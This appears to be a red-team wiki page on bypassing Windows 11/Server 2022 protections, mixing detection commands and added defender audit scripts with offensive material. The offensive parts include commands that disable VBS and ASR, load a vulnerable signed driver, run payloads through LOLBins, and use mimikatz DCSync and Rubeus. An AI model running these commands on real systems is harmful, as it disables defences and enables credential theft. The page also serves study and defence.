# Win11/Server2022 Evasion

Modern Windows security features and bypass techniques for Windows 11 and Server 2022+.

> **Skill Level**: Advanced\
> **Prerequisites**: Windows internals, memory management, assembly basics

## Security Features Overview

| Feature           | Description                   | Bypass Difficulty |
| ----------------- | ----------------------------- | ----------------- |
| VBS               | Virtualization-Based Security | Hard              |
| HVCI              | Hypervisor Code Integrity     | Hard              |
| CET               | Control-flow Enforcement      | Medium-Hard       |
| CFG               | Control Flow Guard            | Medium            |
| ASR               | Attack Surface Reduction      | Medium            |
| Credential Guard  | Isolated LSASS                | Hard              |
| WDAC              | Windows Defender App Control  | Medium            |
| Smart App Control | AI-based blocking             | Medium            |

## Virtualization-Based Security (VBS)

### Detection

```powershell
# Check if VBS is enabled
Get-ComputerInfo | Select-Object -Property DeviceGuard*

# Check via WMI/CIM (VirtualizationBasedSecurityStatus: 0 = off, 1 = enabled but not running, 2 = running)
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

# Registry check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity

# systeminfo output (same data msinfo32 shows under "Virtualization-based security")
systeminfo | findstr /i "virtualization"
```

### VBS Components

```
VBS creates isolated memory regions protected by hypervisor:
- Credential Guard: Protects LSASS secrets
- HVCI: Validates kernel code integrity
- Windows Defender Application Guard: Browser isolation

When VBS is enabled:
- Direct kernel memory access is restricted
- Credential dumping from LSASS is blocked
- Unsigned kernel drivers cannot load
```

### Bypass Approaches

```
1. Boot Configuration Attack
   - Modify BCD to disable VBS (requires admin + reboot)
   - bcdedit /set hypervisorlaunchtype off

2. Firmware/UEFI Attack
   - Requires physical access or firmware vulnerability
   - Disable virtualization in BIOS

3. Target Data Before VBS Protection
   - Intercept credentials during authentication
   - Hook before data enters secure enclave

4. Exploit VBS Implementation Bugs
   - Research ongoing for hypervisor escapes
```

## Hypervisor Code Integrity (HVCI)

### Detection

```powershell
# Check HVCI (Memory Integrity) status via Device Guard settings
# SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI
(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning

# Registry view of the same setting (Enabled = 1)
reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled
```
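The VBS and HVCI checks above return raw numbers. The following script, added here and not part of the original page, decodes `Win32_DeviceGuard` into a readable report and flags the two weak states the bypass lists rely on: a service that is configured but not running, and Credential Guard enabled without UEFI lock (`LsaCfgFlags`). Value meanings follow Microsoft's documentation for `Win32_DeviceGuard` and `LsaCfgFlags`.

```powershell
# Added example (not from the original page): decode Win32_DeviceGuard into a
# readable VBS / HVCI / Credential Guard report and flag weak configurations.
$serviceNames = @{
    1 = 'Credential Guard'
    2 = 'HVCI (Memory Integrity)'
    3 = 'System Guard Secure Launch'
    4 = 'SMM Firmware Measurement'
}
function Get-ServiceLabel([int]$Id) {
    if ($serviceNames.ContainsKey($Id)) { $serviceNames[$Id] } else { "Service $Id" }
}

$dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

$vbsState = switch ([int]$dg.VirtualizationBasedSecurityStatus) {
    0 { 'Not enabled' }
    1 { 'Enabled but not running' }
    2 { 'Enabled and running' }
    default { "Unknown ($_)" }
}
$configured = @($dg.SecurityServicesConfigured | ForEach-Object { [int]$_ })
$running    = @($dg.SecurityServicesRunning    | ForEach-Object { [int]$_ })

[pscustomobject]@{
    VBS                = $vbsState
    ServicesConfigured = ($configured | ForEach-Object { Get-ServiceLabel $_ }) -join ', '
    ServicesRunning    = ($running    | ForEach-Object { Get-ServiceLabel $_ }) -join ', '
} | Format-List

# Configured but not running usually means a missing prerequisite (Secure Boot,
# IOMMU) or a hypervisor switched off through the boot configuration.
foreach ($id in $configured) {
    if ($id -notin $running) { Write-Warning "Configured but not running: $(Get-ServiceLabel $id)" }
}

# LsaCfgFlags: 1 = Credential Guard with UEFI lock, 2 = enabled without lock
# (an admin can turn it off with a registry change and a reboot), 0 = disabled.
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name LsaCfgFlags -ErrorAction SilentlyContinue
switch ([int]$lsa.LsaCfgFlags) {
    1 { 'Credential Guard: enabled with UEFI lock' }
    2 { Write-Warning 'Credential Guard: enabled WITHOUT UEFI lock' }
    default { 'Credential Guard: not configured via LsaCfgFlags (may be on by default on Win11 22H2+)' }
}
```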

### Impact on Attacks

```
HVCI blocks:
- Loading unsigned kernel drivers
- Kernel code modification
- Many rootkit techniques

Still possible:
- Signed vulnerable drivers (BYOVD)
- User-mode attacks
- Living-off-the-land techniques
```

### BYOVD (Bring Your Own Vulnerable Driver)

```powershell
# Use known vulnerable signed driver
# Example: Dell dbutil_2_3.sys (CVE-2021-21551)

# Load vulnerable driver (sc.exe, not the PowerShell alias sc = Set-Content)
sc.exe create evildriver binPath= "C:\path\to\vulnerable.sys" type= kernel
sc.exe start evildriver

# Use driver's vulnerability to:
# - Read/write kernel memory
# - Disable security features
# - Load unsigned code

# Known vulnerable drivers:
# - dbutil_2_3.sys (Dell)
# - ASUS drivers (CVE-2019-15125)
# - Gigabyte drivers
# - Capcom.sys

# Tool: KDU (Kernel Driver Utility)
# https://github.com/hfiref0x/KDU
```
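From the defender's side, the driver-loading path above leaves three things to check. The script below is an added example, not code from the original page: it verifies that Microsoft's vulnerable driver blocklist is enforced, lists recent kernel-driver service installs from Service Control Manager event 7045, and hashes every running driver image against a known-bad list. The SHA-256 table is a constructed placeholder; fill it from a feed such as the LOLDrivers project.

```powershell
# Added example (not from the original page): defender-side checks for BYOVD.

# 1) Microsoft's vulnerable driver blocklist (HVCI-enforced) should be on.
$ci = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config' `
    -Name VulnerableDriverBlocklistEnable -ErrorAction SilentlyContinue
if ([int]$ci.VulnerableDriverBlocklistEnable -eq 1) { 'Vulnerable driver blocklist: enabled' }
else { Write-Warning 'Vulnerable driver blocklist: not enabled or value absent' }

# 2) Every "sc.exe create ... type= kernel" produces Service Control Manager
#    event 7045 with ServiceType "kernel mode driver". EventData order is
#    ServiceName, ImagePath, ServiceType, StartType, AccountName.
function Get-RecentKernelDriverInstalls([int]$Days = 7) {
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[2].Value -eq 'kernel mode driver' } |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Service = $_.Properties[0].Value
                Image   = $_.Properties[1].Value
            }
        }
}
Get-RecentKernelDriverInstalls | Format-Table -AutoSize

# 3) Hash every running driver image and compare with known-bad SHA-256 values.
$knownBad = @{
    # constructed placeholder, not a real hash
    '0000000000000000000000000000000000000000000000000000000000000000' = 'example-vulnerable.sys'
}
function Resolve-DriverPath([string]$PathName) {
    # Win32_SystemDriver.PathName may be \??\C:\..., \SystemRoot\..., or relative
    $p = $PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if (-not [IO.Path]::IsPathRooted($p)) { $p = Join-Path $env:SystemRoot $p }
    return $p
}
Get-CimInstance Win32_SystemDriver | Where-Object { $_.State -eq 'Running' -and $_.PathName } |
    ForEach-Object {
        $path = Resolve-DriverPath $_.PathName
        if (Test-Path -LiteralPath $path) {
            $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash.ToLower()
            if ($knownBad.ContainsKey($hash)) {
                Write-Warning "Known vulnerable driver loaded: $($_.Name) -> $path ($($knownBad[$hash]))"
            }
        }
    }
```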

## Control-flow Enforcement Technology (CET)

### What CET Protects

```
CET has two components:
1. Shadow Stack - Protects return addresses
2. Indirect Branch Tracking (IBT) - Validates call targets

Shadow Stack:
- Hardware-backed return address protection
- Separate stack stores return addresses
- Mismatch = exception

Impact on ROP:
- Traditional ROP chains fail
- Return addresses must match shadow stack
```

### Detection

```powershell
# Check whether a process's executable has the user-mode shadow stack mitigation set
# (Get-ProcessMitigation has no CET* properties; the CET setting is UserShadowStack)
Get-ProcessMitigation -Name notepad.exe | Select-Object -ExpandProperty UserShadowStack

# Check CPU support
(Get-CimInstance Win32_Processor).Name
# Look for CET-capable Intel 11th gen+ or AMD Zen 3+
```

### Bypass Techniques

```
1. JOP (Jump-Oriented Programming)
   - Use JMP gadgets instead of RET
   - Doesn't touch shadow stack
   - More complex to build chains

2. COP (Call-Oriented Programming)
   - Use CALL/JMP sequences
   - Harder but possible

3. Target Non-CET Processes
   - Legacy applications
   - 32-bit processes (less coverage)

4. Disable CET for Process
   - If admin, can modify process mitigation policy
   - SetProcessMitigationPolicy()

5. Stack Pivoting Before CET Init
   - Attack during process startup
   - Before CET is fully enabled
```

## Control Flow Guard (CFG)

### How CFG Works

```
CFG validates indirect call targets:
1. Compiler creates bitmap of valid call targets
2. Runtime validates calls against bitmap
3. Invalid target = exception

Protected: Indirect calls (call [rax])
Not Protected: Direct calls, returns (use CET)
```

### Bypass Techniques

```c
// 1. Call existing valid functions with controlled arguments
// Find function in CFG bitmap that does what you need

// 2. Overwrite CFG bitmap
// Requires arbitrary write primitive
// Bitmap at ntdll!LdrSystemDllInitBlock+0x70

// 3. Use non-CFG modules
// Older DLLs may not have CFG
// JIT-compiled code regions

// 4. Return-oriented attacks (before CET)
// CFG doesn't protect returns

// 5. Data-only attacks
// Corrupt data, not control flow
```

```powershell
# Check if module has CFG
dumpbin /headers module.dll | findstr "Guard"
```

## Windows Defender Application Control (WDAC)

### Detection

```powershell
# Check whether a WDAC / Code Integrity policy is enforced
# CodeIntegrityPolicyEnforcementStatus: 0 = off, 1 = audit, 2 = enforced (kernel mode)
# UsermodeCodeIntegrityPolicyEnforcementStatus: same scale for user mode
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard |
    Select-Object CodeIntegrityPolicyEnforcementStatus, UsermodeCodeIntegrityPolicyEnforcementStatus

# Defender AV status (separate from WDAC, but usually checked alongside it)
Get-CimInstance -ClassName MSFT_MpComputerStatus -Namespace root\Microsoft\Windows\Defender

# List deployed binary CI policies (single-policy and multi-policy locations)
Get-ChildItem -Path C:\Windows\System32\CodeIntegrity\SIPolicy.p7b, C:\Windows\System32\CodeIntegrity\CiPolicies\Active\*.cip -ErrorAction SilentlyContinue

# Get-CIPolicy reads the XML form of a policy, not the compiled .p7b/.cip
Get-CIPolicy -FilePath C:\path\to\policy.xml
```

### Bypass Techniques

```powershell
# 1. LOLBins - Living Off The Land Binaries
# Use Microsoft-signed binaries
# https://lolbas-project.github.io/

# MSBuild (if allowed)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.csproj

# InstallUtil
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll

# CMSTP
cmstp.exe /ni /s payload.inf

# 2. Signed vulnerable applications
# Use legitimate signed apps with vulnerabilities

# 3. Script interpreters (if allowed)
# PowerShell in Constrained Language Mode bypass
# Python, Perl if installed

# 4. DLL side-loading
# Hijack DLL loaded by allowed application
```

## Attack Surface Reduction (ASR)

### ASR Rules

```powershell
# Check enabled ASR rules
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions

# Common rules:
# - Block Office macro code
# - Block executable content from email
# - Block process creation from Office
# - Block credential stealing from LSASS
```

### Bypass Approaches

```
1. Rule-specific bypasses
   - Each rule has edge cases
   - Test specific rule implementation

2. Parent process spoofing
   - Make malicious process appear as allowed parent
   
3. Use unprotected applications
   - Not all apps covered by rules

4. Disable ASR (requires admin)
   Set-MpPreference -AttackSurfaceReductionRules_Ids <GUID> -AttackSurfaceReductionRules_Actions Disabled
```
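The `Get-MpPreference` output above is two parallel arrays of GUIDs and action codes, which is hard to read and easy to misjudge. The script below, an added example and not part of the original page, maps the rules this page lists to their enforcement state and then pulls the Defender configuration-change events (event 5007) that a `Set-MpPreference ... Disabled` leaves behind. The GUID-to-name map uses Microsoft's published ASR rule IDs; confirm them against the current reference before relying on it.

```powershell
# Added example (not from the original page): ASR enforcement audit plus
# detection of ASR configuration changes via Defender event 5007.
$ruleNames = @{
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
    'd4f940ab-401b-4efc-aadc-ad5f3c50688a' = 'Block all Office applications from creating child processes'
    'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550' = 'Block executable content from email client and webmail'
    '92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b' = 'Block Win32 API calls from Office macros'
}
# Set-MpPreference action codes
$actionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Get-AsrRuleState {
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    $configured = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $configured[$ids[$i].ToLower()] = [int]$acts[$i] }

    foreach ($guid in $ruleNames.Keys) {
        $state = 'Not configured'
        if ($configured.ContainsKey($guid)) {
            $code  = $configured[$guid]
            $state = if ($actionNames.ContainsKey($code)) { $actionNames[$code] } else { "Unknown ($code)" }
        }
        [pscustomobject]@{
            Rule      = $ruleNames[$guid]
            State     = $state
            Enforcing = ($state -eq 'Block')   # Audit, Warn, Disabled and missing all count as not enforcing
        }
    }
}
Get-AsrRuleState | Sort-Object Enforcing | Format-Table -AutoSize

# Defender logs event 5007 on every configuration change; the message names the
# registry value that changed, so ASR rule edits can be filtered by path.
function Get-AsrConfigChanges([int]$Days = 7) {
    $filter = @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007
                 StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'ASR\\Rules' } |
        Select-Object TimeCreated, Message
}
Get-AsrConfigChanges | Format-List
```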

## Credential Guard Bypass

### When Enabled

```
Credential Guard protects:
- NTLM hashes
- Kerberos TGTs/session keys
- Derived domain credentials

NOT protected:
- Credentials before they enter LSASS
- Cached credentials (DPAPI protected)
- Credentials for local accounts
```

### Attack Alternatives

```powershell
# 1. Keylogging - capture before protection
# Hook credential providers

# 2. Token manipulation
# Tokens are still in normal memory
Invoke-TokenManipulation

# 3. Kerberos ticket attacks
# Request new tickets, don't steal existing
Rubeus.exe asktgt /user:admin /password:pass

# 4. DCSync (if DA)
# Still works - network-based
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# 5. Target unprotected credentials
# Service account passwords in registry
# Cached credentials on disk
# Browser passwords
```

## Smart App Control

### What It Does

```
Windows 11 22H2+ feature:
- AI/ML-based application reputation
- Blocks untrusted executables
- Three modes: On, Evaluation, Off
```

### Bypass Approaches

```
1. Signed binaries (EV certificate)
2. LOLBins (Microsoft-signed)
3. In-memory execution (if possible)
4. Abuse trusted applications
5. Wait for evaluation mode to turn off
```

## Process Injection (Modern)

### Techniques That Still Work

```c
// 1. Thread Hijacking with hardware breakpoints
// Set HWBP, wait for trigger, modify context

// 2. Module Stomping
// Overwrite legitimate DLL in memory
// Avoid creating new executable memory

// 3. Transacted Hollowing
// Use NTFS transactions for cleaner hollowing

// 4. Process Ghosting
// Create file, mark for deletion, map as image
// File disappears but process runs
```

### Tools

* [process_ghosting](https://github.com/hasherezade/process_ghosting) - Process Ghosting
* [ModuleStomping](https://github.com/countercept/ModuleStomping) - Module Stomping
* [Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) - AMSI bypass collection (PowerShell)

## Detection Evasion Summary

| Attack             | Pre-Win11 | Win11 with VBS |
| ------------------ | --------- | -------------- |
| Mimikatz sekurlsa  | ✓         | ✗ (Cred Guard) |
| Kernel driver load | ✓         | ✗ (HVCI)       |
| ROP chains         | ✓         | ✗ (CET)        |
| Unsigned code      | ✓         | ✗ (WDAC)       |
| BYOVD              | ✓         | ✓              |
| Token manipulation | ✓         | ✓              |
| LOLBins            | ✓         | ✓              |
| DCSync             | ✓         | ✓              |

## Related Topics

* [RT/EDR Evasion](/others/rt-edr.md) - General evasion techniques
* [Windows Post-Exploitation](/post-exploitation/windows.md) - Windows attacks
* [Active Directory](/post-exploitation/windows/ad.md) - AD attacks
